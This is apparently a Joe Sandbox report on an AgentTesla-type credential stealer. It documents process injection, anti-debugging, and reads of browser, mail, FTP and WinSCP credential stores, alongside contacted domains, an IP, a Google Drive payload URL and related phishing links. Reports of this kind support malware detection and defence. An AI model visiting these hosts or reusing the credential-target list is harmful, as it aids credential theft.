Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

Code function: 0_2_70B21BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_70B21BFF

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

Code function: 0_2_02AC02BF rdtsc

0_2_02AC02BF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_02AD3A08 mov eax, dword ptr fs:[00000030h]	0_2_02AD3A08
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_02AD4F37 mov eax, dword ptr fs:[00000030h]	0_2_02AD4F37
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Code function: 0_2_02ACB16D mov eax, dword ptr fs:[00000030h]	0_2_02ACB16D

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 4_2_20AD8B90 LdrInitializeThunk,

4_2_20AD8B90

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 1390000

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe"			Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe"			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

0_2_0040352D

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 4372, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Source: Yara match	File source: 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 4372, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 4372, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	211 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	3 File and Directory Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Native API	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	1 Obfuscated Files or Information	1 Credentials in Registry	117 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	111 Process Injection	1 DLL Side-Loading	Security Account Manager	331 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	1 Non-Standard Port	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	1 Registry Run Keys / Startup Folder	1 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	Scheduled Transfer	2 Non-Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	251 Virtualization/Sandbox Evasion	LSA Secrets	251 Virtualization/Sandbox Evasion	SSH	Keylogging	Data Transfer Size Limits	123 Application Layer Protocol	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	111 Process Injection	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	22%	ReversingLabs	Win32.Trojan.Nemesis

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
gonzalezestalote.com	0%	Virustotal		Browse
x1.i.lencr.org	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://x1.i.lencr.org/	0%	Avira URL Cloud	safe
http://HtsTzf40dpytHYvq.orgt-	0%	Avira URL Cloud	safe
http://cps.letsencrypt.org0	0%	Avira URL Cloud	safe
http://HtsTzf40dpytHYvq.org	0%	Avira URL Cloud	safe
http://x1.i.lencr.org:80/	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	0%	Avira URL Cloud	safe
http://mail.gonzalezestalote.com	0%	Avira URL Cloud	safe
http://HtsTzf40dpytHYvq.org0=5	0%	Avira URL Cloud	safe
http://UUaKae.com	0%	Avira URL Cloud	safe
http://r3.i.lencr.org/0	0%	Avira URL Cloud	safe
http://x1.c.lencr.org/0	0%	Avira URL Cloud	safe
http://x1.i.lencr.org/0	0%	Avira URL Cloud	safe
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	0%	Avira URL Cloud	safe
https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external	0%	Avira URL Cloud	safe
http://r3.o.lencr.org0	0%	Avira URL Cloud	safe
http://gonzalezestalote.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
drive.google.com	142.250.186.78	true	false		high
gonzalezestalote.com	185.101.224.45	true	false	0%, Virustotal, Browse	unknown
googlehosted.l.googleusercontent.com	142.250.185.225	true	false		high
doc-0k-0s-docs.googleusercontent.com	unknown	unknown	false		high
x1.i.lencr.org	unknown	unknown	false	0%, Virustotal, Browse	unknown
mail.gonzalezestalote.com	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://doc-0k-0s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nh1k27nak7lbv5aqag412s4mssudfrf2/1657252875000/16799943050313356466/*/1Pd9u4MvCgkvBmkO27OGhmEo8sWZCKhPL?e=download&uuid=f3d0ce5e-3a8f-48f4-9bee-bdf0b7c9b76e	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	CasPol.exe, 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://x1.i.lencr.org/	CasPol.exe, 00000004.00000003.1221555927.000000001FD0D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1221139150.000000001FD06000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1228880026.000000001FD08000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1214700054.000000001FD06000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1215152524.000000001FD0D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5760039892.000000001FCE4000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1226299470.000000001FD07000.00000004.00000800.00020000.00000000.sdmp, 2D85F72862B55C4EADD9E66E06947F3D0.4.dr	false	Avira URL Cloud: safe	unknown
http://HtsTzf40dpytHYvq.orgt-	CasPol.exe, 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://cps.letsencrypt.org0	CasPol.exe, 00000004.00000002.5728527497.0000000001651000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5763292048.0000000020B70000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5760039892.000000001FCE4000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5753079794.000000001DC59000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://HtsTzf40dpytHYvq.org	CasPol.exe, 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5752554235.000000001DC30000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5752986004.000000001DC53000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5753308693.000000001DC7D000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.i.lencr.org:80/	CasPol.exe, 00000004.00000002.5760039892.000000001FCE4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	CasPol.exe, 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://mail.gonzalezestalote.com	CasPol.exe, 00000004.00000002.5753079794.000000001DC59000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://HtsTzf40dpytHYvq.org0=5	CasPol.exe, 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://support.google.com/chrome/?p=plugin_flash	CasPol.exe, 00000004.00000002.5751992526.000000001DBCD000.00000004.00000800.00020000.00000000.sdmp	false		high
http://UUaKae.com	CasPol.exe, 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe	false		high
https://doc-0k-0s-docs.googleusercontent.com/	CasPol.exe, 00000004.00000003.1079976348.0000000001653000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5728527497.0000000001651000.00000004.00000020.00020000.00000000.sdmp	false		high
http://r3.i.lencr.org/0	CasPol.exe, 00000004.00000002.5728527497.0000000001651000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5763292048.0000000020B70000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5760039892.000000001FCE4000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5753079794.000000001DC59000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://creativecommons.org/licenses/by-sa/4.0/	folder-saved-search.png.0.dr	false		high
https://doc-0k-0s-docs.googleusercontent.com/C	CasPol.exe, 00000004.00000003.1079976348.0000000001653000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5728527497.0000000001651000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/	CasPol.exe, 00000004.00000002.5727597046.0000000001616000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5726396411.00000000015DB000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	CasPol.exe, 00000004.00000002.5763767522.0000000020BD5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5759864400.000000001FCC8000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5728527497.0000000001651000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5763292048.0000000020B70000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5753079794.000000001DC59000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.i.lencr.org/0	CasPol.exe, 00000004.00000002.5763767522.0000000020BD5000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5759864400.000000001FCC8000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5728527497.0000000001651000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5763292048.0000000020B70000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5753079794.000000001DC59000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	CasPol.exe, 00000004.00000002.5751179042.000000001DB41000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external	CasPol.exe, 00000004.00000003.1075374097.0000000001658000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1075768789.0000000001658000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://r3.o.lencr.org0	CasPol.exe, 00000004.00000002.5728527497.0000000001651000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5763292048.0000000020B70000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5760039892.000000001FCE4000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5753079794.000000001DC59000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://gonzalezestalote.com	CasPol.exe, 00000004.00000002.5753079794.000000001DC59000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://doc-0k-0s-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/nh1k27na	CasPol.exe, 00000004.00000003.1075374097.0000000001658000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1079976348.0000000001653000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5728150845.0000000001635000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.5728527497.0000000001651000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000003.1075768789.0000000001658000.00000004.00000020.00020000.00000000.sdmp	false		high
https://drive.google.com/#	CasPol.exe, 00000004.00000002.5726396411.00000000015DB000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.186.78	drive.google.com	United States	15169	GOOGLEUS	false
185.101.224.45	gonzalezestalote.com	Spain	56732	HOSTINET_ASES	false
142.250.185.225	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	659406
Start date and time: 08/07/202205:58:16	2022-07-08 05:58:16 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/11@4/3
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 22.9% (good quality ratio 22.5%) Quality average: 88.3% Quality standard deviation: 21.1%
HCA Information:	Successful, ratio: 98% Number of executed functions: 140 Number of non-executed functions: 45
Cookbook Comments:	Found application associated with file extension: .exe Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): taskhostw.exe, MusNotification.exe, dllhost.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, MusNotificationUx.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.5.88, 20.82.19.171, 104.117.200.9, 209.197.3.8, 93.184.221.240
Excluded domains from analysis (whitelisted): spclient.wg.spotify.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e-0009.e-msedge.net, arc.msn.com, wu.azureedge.net, login.live.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, img-prod-cms-rt-microsoft-com.akamaized.net, crl.root-x1.letsencrypt.org.edgekey.net, evoke-windowsservices-tas-msedge-net.e-0009.e-msedge.net, client.wns.windows.com, fs.microsoft.com, wu.ec.azureedge.net, settings-win.data.microsoft.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wd-prod-cp.trafficmanager.net, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, wdcpalt.microsoft.com, evoke-windowsservices-tas.msedge.net, wd-prod-cp-eu-west-2-fe.westeurope.cloudapp.azure.com, nexusrules.officeapps.live.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:00:59	API Interceptor	1x Sleep call for process: SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe modified
06:01:42	API Interceptor	2691x Sleep call for process: CasPol.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
185.101.224.45	SecuriteInfo.com.Gen.Variant.Nemesis.8923.31381.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Gen.Variant.Nemesis.8928.4279.exe	Get hash	malicious	Browse
	Justificante de Transferencia.exe	Get hash	malicious	Browse
	JUSTIFICANTE 0099A435.exe	Get hash	malicious	Browse
	PEDIDO N#U00ba 66552022 de fecha 16-06-2022.exe	Get hash	malicious	Browse
	Banco BPI Comprovativo de Transfer#U00eancia.exe	Get hash	malicious	Browse
	JUSTIFICANTE DE PAGO.pdf.vbs	Get hash	malicious	Browse
	JUSTIFICANTE DE PAGO.txt.vbs	Get hash	malicious	Browse
	000224_G991DF982E4A4914AA972EC0657DE68F.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.NSISInject.FC.MTB.3347.exe	Get hash	malicious	Browse
	SecuriteInfo.com.TrojanDownloader.Win32.GuLoader.05b6a4ab.7525.exe	Get hash	malicious	Browse
	Justificante de Transferencia.exe	Get hash	malicious	Browse
	SecuriteInfo.com.TrojanDownloader.Win32.GuLoader.05b6a4ab.12599.exe	Get hash	malicious	Browse
	SecuriteInfo.com.TrojanDownloader.Win32.GuLoader.05b6a4ab.6220.exe	Get hash	malicious	Browse
	SecuriteInfo.com.W32.Ninjector.CM.genEldorado.14602.exe	Get hash	malicious	Browse
	side.exe	Get hash	malicious	Browse
	Facturas DHL Parcel 46_008125.exe	Get hash	malicious	Browse
	Facturas DHL Parcel 46_008125.exe	Get hash	malicious	Browse
	BBVA-Confirming Facturas Pagadas al Vencimiento.exe	Get hash	malicious	Browse
	ComprovativoExecu#U00e7#U00e3oTransfer#U00eancia.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HOSTINET_ASES	SecuriteInfo.com.Gen.Variant.Nemesis.8923.31381.exe	Get hash	malicious	Browse	185.101.224.45
	SecuriteInfo.com.Gen.Variant.Nemesis.8928.4279.exe	Get hash	malicious	Browse	185.101.224.45
	Justificante de Transferencia.exe	Get hash	malicious	Browse	185.101.224.45
	JUSTIFICANTE 0099A435.exe	Get hash	malicious	Browse	185.101.224.45
	PEDIDO N#U00ba 66552022 de fecha 16-06-2022.exe	Get hash	malicious	Browse	185.101.224.45
	Banco BPI Comprovativo de Transfer#U00eancia.exe	Get hash	malicious	Browse	185.101.224.45
	JUSTIFICANTE DE PAGO.pdf.vbs	Get hash	malicious	Browse	185.101.224.45
	JUSTIFICANTE DE PAGO.txt.vbs	Get hash	malicious	Browse	185.101.224.45
	000224_G991DF982E4A4914AA972EC0657DE68F.exe	Get hash	malicious	Browse	185.101.224.45
	SecuriteInfo.com.Trojan.Win32.NSISInject.FC.MTB.3347.exe	Get hash	malicious	Browse	185.101.224.45
	SecuriteInfo.com.TrojanDownloader.Win32.GuLoader.05b6a4ab.7525.exe	Get hash	malicious	Browse	185.101.224.45
	Justificante de Transferencia.exe	Get hash	malicious	Browse	185.101.224.45
	SecuriteInfo.com.TrojanDownloader.Win32.GuLoader.05b6a4ab.12599.exe	Get hash	malicious	Browse	185.101.224.45
	SecuriteInfo.com.TrojanDownloader.Win32.GuLoader.05b6a4ab.6220.exe	Get hash	malicious	Browse	185.101.224.45
	SecuriteInfo.com.W32.Ninjector.CM.genEldorado.14602.exe	Get hash	malicious	Browse	185.101.224.45
	side.exe	Get hash	malicious	Browse	185.101.224.45
	Facturas DHL Parcel 46_008125.exe	Get hash	malicious	Browse	185.101.224.45
	Facturas DHL Parcel 46_008125.exe	Get hash	malicious	Browse	185.101.224.45
	BBVA-Confirming Facturas Pagadas al Vencimiento.exe	Get hash	malicious	Browse	185.101.224.45
	ComprovativoExecu#U00e7#U00e3oTransfer#U00eancia.exe	Get hash	malicious	Browse	185.101.224.45

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	SecuriteInfo.com.Gen.Variant.Nemesis.8923.31381.exe	Get hash	malicious	Browse	142.250.186.78 142.250.185.225
	https://r20.rs6.net/tn.jsp?t=3Dqcuzd54ab.0.0.sqy9yutab.0&1d=preview&r=3&p=https://Ox3AFOei2.oneartandscalemodel.in/?e=amisra@generalatlantic.com	Get hash	malicious	Browse	142.250.186.78 142.250.185.225
	SecuriteInfo.com.Gen.Variant.Nemesis.8928.4279.exe	Get hash	malicious	Browse	142.250.186.78 142.250.185.225
	ypSP0Yp08Q.exe	Get hash	malicious	Browse	142.250.186.78 142.250.185.225
	Master Statement.html	Get hash	malicious	Browse	142.250.186.78 142.250.185.225
	https://kwikrielectronics.com/wp-admin/OV4/d21jYWxpc3RlckBjZm5jLm9yZw==	Get hash	malicious	Browse	142.250.186.78 142.250.185.225
	https://link-en2.pages.dev:443/	Get hash	malicious	Browse	142.250.186.78 142.250.185.225
	Master Statement.html	Get hash	malicious	Browse	142.250.186.78 142.250.185.225
	https://beaute-reine-didon.com/	Get hash	malicious	Browse	142.250.186.78 142.250.185.225
